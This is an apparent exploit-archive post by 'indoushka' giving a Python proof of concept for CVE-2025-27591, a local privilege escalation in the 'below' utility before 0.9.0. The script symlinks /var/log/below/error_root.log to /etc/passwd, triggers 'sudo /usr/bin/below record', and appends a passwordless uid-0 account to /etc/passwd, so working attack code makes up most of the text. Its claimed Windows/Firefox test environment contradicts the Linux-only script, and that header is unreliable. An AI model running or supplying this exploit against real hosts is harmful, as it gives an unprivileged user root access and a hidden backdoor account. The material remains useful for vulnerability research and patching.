==================================================================================================================================
| # Title : Below <v0.9.0 Symlink-Based Privilege Escalation via Log Manipulation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) — note: the POC below is Linux-only (it needs /var/log/below, sudo, /usr/bin/below and /etc/passwd), so this environment does not match the script's target |
| # Vendor : https://github.com/facebookincubator/below |
==================================================================================================================================
[+] Summary : This Python script demonstrates a local privilege escalation technique associated with CVE-2025-27591 in the `below` utility (versions before 0.9.0). Preconditions: the directory /var/log/below exists and is writable by the unprivileged user, and that user can run `sudo /usr/bin/below record`. The script replaces /var/log/below/error_root.log with a symlink to /etc/passwd, runs `below` under sudo so the root-owned process touches the log path through the symlink, and then attempts to append a passwordless uid-0 account line ("nikolas-trey") to /etc/passwd; the final append only succeeds if that trigger left /etc/passwd writable by the user.
[+] POC :
import os
import subprocess
import sys
from pathlib import Path
# Paths the PoC touches. main() requires LOG_DIR to be writable by the
# current user; that is the condition that lets a local user plant the
# symlink in the first place.
TARGET_FILE = "/etc/passwd"   # where error_root.log is redirected to
TMP_PAYLOAD = "/tmp/payload"  # staging file for the line appended later
LOG_DIR = "/var/log/below"
LOG_FILE = os.path.join(LOG_DIR, "error_root.log")  # log path opened by root
# passwd(5) entry: login, empty password field, uid 0, gid 0, gecos, home, shell.
# An empty password field is what makes the account usable without a secret
# (subject to the host's login stack honouring it -- not verified here).
FAKE_USER_LINE = "nikolas-trey::0:0:nikolas-trey:/root:/bin/bash\n"
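def main() -> None:
    """Run the CVE-2025-27591 symlink PoC against `below` (< 0.9.0).

    Sequence:
      1. stage FAKE_USER_LINE in TMP_PAYLOAD;
      2. require LOG_DIR to exist and be writable by the current user
         (nothing here changes that -- the vulnerable install provides it);
      3. replace LOG_DIR/error_root.log with a symlink to TARGET_FILE;
      4. run `sudo /usr/bin/below record` so the root-owned process opens
         the log path and follows the symlink;
      5. append the staged line through the symlink; this only succeeds if
         step 4 left TARGET_FILE writable by this user.

    Returns None; every outcome is printed rather than raised. The symlink
    is removed again at the end (best effort) so later root runs of `below`
    do not keep writing error output into TARGET_FILE. Needs sudo rights
    for /usr/bin/below and a Linux host.
    """
    print("[*] CVE-2025-27591 exploit - Python Version")
    if not _stage_payload():
        return
    if not _plant_symlink():
        return
    try:
        _trigger_below()
        _append_through_symlink()
    finally:
        # Undo the symlink even if something unexpected escaped the steps above.
        _remove_symlink()
    print("[*] Done.")


def _stage_payload() -> bool:
    """Write FAKE_USER_LINE to TMP_PAYLOAD; return False on failure.

    O_NOFOLLOW (plus mode 0600 on creation) refuses a symlink pre-planted
    at the fixed, predictable /tmp name by another local user instead of
    writing through it -- the same bug class this PoC itself exploits.
    """
    try:
        fd = os.open(
            TMP_PAYLOAD,
            os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW,
            0o600,
        )
        with os.fdopen(fd, "w") as f:
            f.write(FAKE_USER_LINE)
        print(f"[+] Payload written to {TMP_PAYLOAD}")
        return True
    except OSError as e:
        print(f"[-] Failed to write payload: {e}")
        return False


def _plant_symlink() -> bool:
    """Make LOG_DIR/error_root.log a symlink to TARGET_FILE; False on failure.

    Requires LOG_DIR to be writable by the caller. lexists() is used so a
    dangling link from an earlier run is replaced too. Removing a file
    owned by another user here relies on the directory being writable
    (and, presumably, not sticky -- a sticky LOG_DIR would make os.remove
    fail and the PoC stops with the printed error).
    """
    if not os.path.isdir(LOG_DIR):
        print(f"[-] Log directory {LOG_DIR} does not exist.")
        return False
    if not os.access(LOG_DIR, os.W_OK):
        print(f"[-] Log directory {LOG_DIR} is not writable.")
        return False
    print(f"[+] {LOG_DIR} is writable.")
    if os.path.lexists(LOG_FILE):
        try:
            os.remove(LOG_FILE)
            print(f"[+] Removed existing file/symlink: {LOG_FILE}")
        except OSError as e:
            print(f"[-] Could not remove {LOG_FILE}: {e}")
            return False
    try:
        os.symlink(TARGET_FILE, LOG_FILE)
    except OSError as e:
        print(f"[-] Symlink creation failed: {e}")
        return False
    print(f"[+] Symlink created: {LOG_FILE} -> {TARGET_FILE}")
    return True


def _trigger_below() -> None:
    """Run `sudo /usr/bin/below record` so a root process opens LOG_FILE.

    `below record` does not return on its own, so the call is bounded by a
    5 s timeout and hitting it is the expected outcome. NOTE(review): the
    timeout kills the `sudo` process this user started; the root-owned
    `below` child may outlive it. If sudo needs a password, the prompt
    (on the controlling tty, stdin is not redirected) eats into the 5 s.
    """
    print("[*] Triggering sudo log write via `below`...")
    try:
        subprocess.run(
            ["sudo", "/usr/bin/below", "record"],
            timeout=5,
            capture_output=True,
            text=True,
            check=False,  # a non-zero exit is reported by the append step, not here
        )
    except subprocess.TimeoutExpired:
        print("[*] 'below' command timed out (expected)")
    except (OSError, subprocess.SubprocessError) as e:
        # e.g. FileNotFoundError when sudo is not installed.
        print(f"[*] Note: execution error: {e}")


def _append_through_symlink() -> None:
    """Append the staged payload via LOG_FILE, i.e. into TARGET_FILE.

    PermissionError means the trigger did not leave TARGET_FILE writable;
    FileNotFoundError means the symlink no longer resolves.
    """
    try:
        with open(TMP_PAYLOAD, "r") as p:
            data = p.read()
        with open(LOG_FILE, "a") as target:
            target.write(data)
        print("[+] Payload appended successfully.")
    except PermissionError:
        print("[-] Permission Denied.")
    except FileNotFoundError:
        print("[-] Target file not found (symlink broken).")
    except Exception as e:  # last-resort report; the PoC never re-raises
        print(f"[-] Unexpected error: {e}")


def _remove_symlink() -> None:
    """Best-effort removal of the planted symlink.

    Leaving LOG_DIR/error_root.log pointing at TARGET_FILE would presumably
    make every later root run of `below` keep writing its error log into
    TARGET_FILE. Only a symlink is removed, never a regular file.
    """
    if not os.path.islink(LOG_FILE):
        return
    try:
        os.remove(LOG_FILE)
        print(f"[+] Removed symlink {LOG_FILE}")
    except OSError as e:
        print(f"[!] Could not remove symlink {LOG_FILE}: {e}")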
# Script entry point. main() prints its progress and returns None, so the
# process exit status is 0 whether or not the append into /etc/passwd worked.
if __name__ == "__main__":
    main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================